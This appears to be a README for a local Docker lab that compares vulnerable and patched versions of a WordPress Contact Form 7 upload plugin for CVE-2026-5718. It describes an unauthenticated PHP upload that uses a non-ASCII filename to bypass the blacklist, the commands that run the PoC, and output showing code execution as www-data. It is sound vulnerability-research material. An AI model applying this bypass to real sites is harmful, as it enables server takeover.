## https://sploitus.com/exploit?id=1ADBABA8-FF70-5B1B-9087-36F63592123B
# CVE-2026-5718 Local Docker Lab
Local-only vulnerable vs patched Docker lab for **CVE-2026-5718**, affecting the WordPress plugin **Drag and Drop Multiple File Upload for Contact Form 7**.
This lab demonstrates the difference between the vulnerable version `1.3.9.6` and the patched version `1.3.9.7` using a least-harm PHP execution proof inside a Docker-only environment.
> Scope: localhost / Docker network only. Do not use this PoC against systems you do not own or do not have explicit permission to test.
---
## Executive Summary
CVE-2026-5718 is an arbitrary file upload vulnerability in Drag and Drop Multiple File Upload for Contact Form 7 up to and including version `1.3.9.6`.
The issue is triggered when custom blacklist types are configured and a filename contains non-ASCII characters. In the vulnerable version, a dangerous `.php` upload can bypass the intended protection and remain executable. Version `1.3.9.7` fixes the issue by rejecting the same upload.
This repository runs two local WordPress services:
* `vuln` on `http://localhost:8081` with plugin version `1.3.9.6`
* `patched` on `http://localhost:8082` with plugin version `1.3.9.7`
---
## Lab Architecture
```text
Host
โโโ http://localhost:8081 -> vulnerable WordPress service
โโโ http://localhost:8082 -> patched WordPress service
Docker network
โโโ vuln
โโโ vuln-db
โโโ patched
โโโ patched-db
```
| Service | Purpose | Host Port | Version |
| ------------ | ------------------------------------- | --------: | ---------------- |
| `vuln` | Vulnerable WordPress lab | `8081` | Plugin `1.3.9.6` |
| `patched` | Patched WordPress lab | `8082` | Plugin `1.3.9.7` |
| `vuln-db` | MySQL database for vulnerable service | internal | MySQL 8.0 |
| `patched-db` | MySQL database for patched service | internal | MySQL 8.0 |
---
## Repository Structure
```text
.
โโโ docker-compose.yml
โโโ patched
โ โโโ Dockerfile
โโโ poc
โ โโโ poc.py
โโโ requirements.txt
โโโ scripts
โ โโโ seed-wordpress.sh
โโโ vuln
โ โโโ Dockerfile
```
---
## Vulnerability Flow
The seeded Contact Form 7 form contains a Drag and Drop Multiple File Upload field:
```text
[mfile upload-file filetypes:* blacklist-types:zip limit:1048576]
```
The PoC uploads a PHP proof file named:
```text
proof-ฮฒ.php
```
The `ฮฒ` character is non-ASCII. This is important because the vulnerability depends on filename handling for non-ASCII input.
High-level flow:
```text
PoC
โ
Fetch lab page and extract DnD CF7 AJAX nonce
โ
Upload proof-ฮฒ.php through wp-admin/admin-ajax.php
โ
Vulnerable 1.3.9.6 accepts and stores the file as .php
โ
PoC requests the uploaded file
โ
Vulnerable lab executes the PHP proof as www-data
```
Patched flow:
```text
PoC
โ
Upload the same proof-ฮฒ.php file
โ
Patched 1.3.9.7 rejects the upload
โ
No PHP file is stored and no code execution occurs
```
---
## Local RCE Proof Design
The uploaded PHP proof is intentionally minimal:
```php
```
The proof only runs `whoami` and `id` to show the execution context. It does not use a reverse shell, persistence, credential access, lateral movement, network scanning, or destructive actions.
The vulnerable service intentionally allows PHP execution in the plugin upload directory so the impact is observable in this local lab. The patched service keeps the safer behavior and rejects the upload at the application validation layer.
---
## Requirements
* Docker Desktop
* Docker Compose v2
* Python 3
Install Python dependencies:
```bash
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
```
---
## Build and Run
Start from a clean state:
```bash
docker compose down -v
docker compose up --build -d
```
Check service status:
```bash
docker compose ps
```
Open the lab pages:
```text
http://localhost:8081/cve-2026-5718-lab/
http://localhost:8082/cve-2026-5718-lab/
```
---
## Run the PoC
Run against the vulnerable service:
```bash
python poc/poc.py --base-url http://localhost:8081
```
Run against the patched service:
```bash
python poc/poc.py --base-url http://localhost:8082
```
The PoC only accepts localhost or loopback targets.
---
## Expected Result
### Vulnerable Service
Expected behavior:
* The upload is accepted.
* The uploaded filename remains a `.php` file.
* The uploaded PHP proof executes as the web server user.
Example output:
```text
Upload response:
{"success":true,"data":{"path":"cve5718proof","file":"proof-\u03b2.php"}}
Proof response:
CVE_2026_5718_LOCAL_RCE_PROOF
whoami=www-data
id=uid=33(www-data) gid=33(www-data) groups=33(www-data)
[result] VULNERABLE behavior observed: uploaded PHP proof executed.
```
### Patched Service
Expected behavior:
* The same upload is rejected.
* The PHP proof is not stored as an executable file.
* No code execution occurs.
Example output:
```text
Upload response:
{"success":false,"data":"Uploaded file is not allowed for file type"}
[result] Upload rejected by the application.
[result] Reason: Uploaded file is not allowed for file type
```
---
## Safety Notes
This lab is intentionally restricted to local testing.
The PoC:
* blocks non-localhost targets,
* does not use a reverse shell,
* does not perform persistence,
* does not read secrets,
* does not scan networks,
* only executes `whoami` and `id` inside the vulnerable container.
The vulnerable service relaxes upload-directory PHP execution only to make the local proof observable. Do not copy that configuration to production.
---
## Cleanup
Stop containers:
```bash
docker compose down
```
Remove containers and volumes:
```bash
docker compose down -v
```
Remove the Python virtual environment:
```bash
rm -rf .venv
```
---
## References
* NVD: CVE-2026-5718
[https://nvd.nist.gov/vuln/detail/CVE-2026-5718](https://nvd.nist.gov/vuln/detail/CVE-2026-5718)
* Patchstack advisory: WordPress Drag and Drop Multiple File Upload for Contact Form 7 Plugin <= 1.3.9.6 - Unauthenticated Arbitrary File Upload via Non-ASCII Filename Blacklist Bypass
[https://patchstack.com/database/wordpress/plugin/drag-and-drop-multiple-file-upload-contact-form-7/vulnerability/wordpress-drag-and-drop-multiple-file-upload-for-contact-form-7-plugin-1-3-9-6-unauthenticated-arbitrary-file-upload-via-non-ascii-filename-blacklist-bypass-vulnerability](https://patchstack.com/database/wordpress/plugin/drag-and-drop-multiple-file-upload-contact-form-7/vulnerability/wordpress-drag-and-drop-multiple-file-upload-for-contact-form-7-plugin-1-3-9-6-unauthenticated-arbitrary-file-upload-via-non-ascii-filename-blacklist-bypass-vulnerability)
* Wordfence Intelligence: Drag and Drop Multiple File Upload for Contact Form 7 <= 1.3.9.6 - Unauthenticated Arbitrary File Upload via Non-ASCII Filename Blacklist Bypass
[https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/drag-and-drop-multiple-file-upload-contact-form-7/drag-and-drop-multiple-file-upload-for-contact-form-7-1396-unauthenticated-arbitrary-file-upload-via-non-ascii-filename-blacklist-bypass](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/drag-and-drop-multiple-file-upload-contact-form-7/drag-and-drop-multiple-file-upload-for-contact-form-7-1396-unauthenticated-arbitrary-file-upload-via-non-ascii-filename-blacklist-bypass)
* GitHub Advisory Database: GHSA-xj7v-jqv6-v48w
[https://github.com/advisories/GHSA-xj7v-jqv6-v48w](https://github.com/advisories/GHSA-xj7v-jqv6-v48w)
* WordPress.org plugin page: Drag and Drop Multiple File Upload for Contact Form 7
[https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/](https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/)
* Plugin vendor page: Drag & Drop Multiple File Upload for Contact Form 7
[https://www.codedropz.com/drag-drop-multiple-file-upload-for-contact-form-7/](https://www.codedropz.com/drag-drop-multiple-file-upload-for-contact-form-7/)
---
## Disclaimer
This repository is for educational and defensive security research only. It is designed to run only on localhost using Docker. Do not use the PoC against public or third-party systems.